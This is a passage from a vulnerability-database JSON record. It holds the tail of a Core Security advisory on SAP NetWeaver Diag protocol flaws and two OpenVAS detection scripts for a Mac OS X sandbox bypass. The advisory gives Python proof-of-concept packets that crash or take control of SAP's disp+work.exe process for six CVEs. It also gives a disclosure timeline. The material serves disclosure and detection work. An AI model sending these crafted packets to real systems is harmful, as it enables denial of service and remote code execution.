options.port))\r\ninitialize(connection)\r\nreceive(connection)\r\n\r\n# Choose one of the following and comment the others\r\n\r\n#[CVE-2012-2611] \r\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\r\ncrash+= \"Y\"*32\r\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2612] \r\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2511]\r\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2512] \r\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2513]\r\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2514]\r\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\r\nsend_message(connection, crash)\r\n\r\nIn the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.\r\n\r\n8.1. SAP Netweaver DiagTraceR3Info Vulnerability\r\n[CVE-2012-2611] The vulnerability can be triggered when SAP Netweaver disp+work.exe module process a specially crafted network packet. Malicious packets are processed by the vulnerable function DiagTraceR3Info in the disp+work.exe module when the Developer Trace is configured at levels 2 or 3 for the \"Dialog processor\" component of the \"Dialog\" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the \"Dispatcher\" service. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\r\ncrash+= \"Y\"*32\r\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\r\nsend_message(connection, crash)\r\n\r\n8.2. SAP Netweaver DiagTraceHex Denial Of Service Vulnerability\r\n[CVE-2012-2612] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceHex in the disp+work.exe. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\r\nsend_message(connection, crash)\r\n\r\n8.3. SAP Netweaver DiagTraceAtoms Denial Of Service Vulnerability\r\n[CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceAtoms. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\r\nsend_message(connection, crash)\r\n\r\n8.4. SAP Netweaver DiagTraceStreamI Denial Of Service Vulnerability\r\n[CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceStreamI and could allow a remote unauthenticated attacker to conduct a denial of service attack.\r\n\r\n\r\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\r\nsend_message(connection, crash)\r\n\r\n8.5. SAP Netweaver Diaginput Denial Of Service Vulnerability\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable function Diaginput, allowing a denial of service attack against the vulnerable systems.\r\n\r\n\r\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\r\nsend_message(connection, crash)\r\n\r\n8.6. SAP Netweaver DiagiEventSource Denial Of Service Vulnerability\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable function DiagiEventSource in the disp+work.exe module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.\r\n\r\n\r\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\r\nsend_message(connection, crash)\r\n\r\n9. Report Timeline\r\n2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012.\r\n2012-01-24: Core sends an advisory draft with technical details.\r\n2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline.\r\n2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible.\r\n2012-02-21: First release date missed.\r\n2012-02-22: Core asks for the status of the fix and notifies that the release date was missed.\r\n2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012.\r\n2012-02-23: Core re-schedules the advisory publication to May 8th.\r\n2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix.\r\n2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed.\r\n2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received).\r\n2012-05-07: Core asks again for the status of the fix.\r\n2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8].\r\n2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information.\r\n2012-05-08: Advisory CORE-2012-0123 published.\r\n2012-05-10: ERRATA: CVE-2011-1516 changed to CVE-2012-2611. CVE-2011-1517 changed to CVE-2012-2612.\r\n10. References\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions \r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \r\n[4] SAP security note 1687910 \r\nhttps://service.sap.com/sap/support/notes/1687910. \r\n\r\n11. About CoreLabs\r\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.\r\n\r\n12. About Core Security Technologies\r\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.\r\n\r\n13. Disclaimer\r\nThe contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n14. PGP/GPG Keys\r\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20705/"}], "openvas": [{"lastseen": "2017-07-19T10:51:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1516", "CVE-2008-7303"], "description": "The host is installed with Apple Mac OS X operating system and\n is prone to sandbox profiles security bypass vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:803223", "href": "http://plugins.openvas.org/nasl.php?oid=803223", "type": "openvas", "title": "Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_macosx_sandbox_profiles_sec_bypass_vuln.nasl 6521 2017-07-04 14:51:10Z cfischer $\n#\n# Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to gain unauthorized\naccess to restricted network resources through the use of Apple events.\n\nImpact Level: Application\";\n\ntag_affected = \"Apple Mac OS X version 10.5.x through 10.7.2\";\n\ntag_insight = \"The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox\nprofiles fails to propagate restrictions to all created processes, which\nallows remote attackers to access network resources via apple events to\ninvoke the execution of other applications not directly restricted by\nthe sandbox.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"The host is installed with Apple Mac OS X operating system and\n is prone to sandbox profiles security bypass vulnerability.\";\n\nif(description)\n{\n script_id(803223);\n script_version(\"$Revision: 6521 $\");\n script_cve_id(\"CVE-2011-1516\", \"CVE-2008-7303\");\n script_bugtraq_id(50644, 50716);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 16:51:10 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-01 12:42:10 +0530 (Fri, 01 Feb 2013)\");\n script_name(\"Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48980\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/71284\");\n script_xref(name : \"URL\" , value : \"http://www.coresecurity.com/content/apple-osx-sandbox-bypass\");\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\n## Variable Initialization\nosName = \"\";\nosVer = \"\";\n\n## Get the OS name\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit (0);\n}\n\n## Get the OS Version\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\n## Check the affected OS versions\nif(version_in_range(version: osVer, test_version:\"10.5.0\", test_version2:\"10.7.2\")){\n security_message(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1516", "CVE-2008-7303"], "description": "The host is installed with Apple Mac OS X operating system and\n is prone to a sandbox profiles security bypass vulnerability.", "modified": "2019-05-22T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:1361412562310803223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803223", "type": "openvas", "title": "Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803223\");\n script_version(\"2019-05-22T12:34:41+0000\");\n script_cve_id(\"CVE-2011-1516\", \"CVE-2008-7303\");\n script_bugtraq_id(50644, 50716);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 12:34:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-02-01 12:42:10 +0530 (Fri, 01 Feb 2013)\");\n script_name(\"Apple Mac OS X Predefined Sandbox Profiles Security Bypass Vulnerability\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.[5-7]\\.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/48980\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/71284\");\n script_xref(name:\"URL\", value:\"http://www.coresecurity.com/content/apple-osx-sandbox-bypass\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to gain unauthorized\n access to restricted network resources through the use of Apple events.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.5.x through 10.7.2.\");\n\n script_tag(name:\"insight\", value:\"The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox\n profiles fails to propagate restrictions to all created processes, which allows remote attackers\n to access network resources via apple events to invoke the execution of other applications not\n directly restricted by the sandbox.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apple Mac OS X operating system and\n is prone to a sandbox profiles security bypass vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(osVer =~ \"^10\\.[5-7]\\.\" && version_in_range(version:osVer, test_version:\"10.5.0\", test_version2:\"10.7.2\")) {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"WillNotFix\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}]}
